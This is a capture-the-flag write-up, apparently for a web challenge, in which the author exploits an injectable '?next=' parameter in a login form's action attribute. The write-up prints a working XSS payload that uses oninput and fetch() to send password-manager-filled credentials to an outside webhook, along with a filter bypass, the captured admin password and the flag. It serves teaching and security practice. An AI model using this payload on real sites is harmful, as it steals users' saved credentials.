There is a website under `http://34.76.228.102:2003` allowing to login with
any login and password excluding `admin`. The `admin` user has it's password
required and logging in as admin would give us the flag. The challenge text
says that admin is using password manager so I assumed their credentials will
be automatically filled when they enter login site.

The website itself allows to send any url and the admin would check it's
security. I've created the webhook using [webhook.site](https://webhook.site)
and it turns out that if I post this webhook url to the system after few
seconds I get the request from that machine.

Examining login page I've found that there is `?next=` added to it's url.
Anything we put into this parameter shows inside of `action` attribute of the
login form. This is the classic XSS vulnerability that we can exploit. We can
add there almost anything, but not `>` as it is changed into `>` on the site,
so we can only operate within the `form` element attributes.

The idea for the payload here is to put the webhook url as `action` attribute
and add `oninput` event handler that will send the login and password as it
will be filled by password manager. Initial idea for the this attribute was:

```  
oninput=fetch(this.action + this[0].value + `-` + this[1].value)  
```

but it turned out that `+` signs are stripped, so I've tried with an array and
join method like this:

```  
oninput=fetch([this.action,this[0].value,`-`,this[1].value].join(``))  
```

and it worked fine. The final payload I've sent was:

```  
http://34.76.228.102:2003/login?next=https://webhook.site/[my_webhook_guid]?c=
oninput=fetch([this.action,this[0].value,`-`,this[1].value].join(``))  
```

And after a couple of seconds I got the series of requests on my webhook with
the last one containing full credentials of an admin:

```  
admin-WxBkJjpgzAdPsEXr  
```

Logging with this credentials it displayed a flag:
`hexCTF{pa55w0rd_m4nag3rs_c4n_hav3_vuln3rabilit1es_t00}`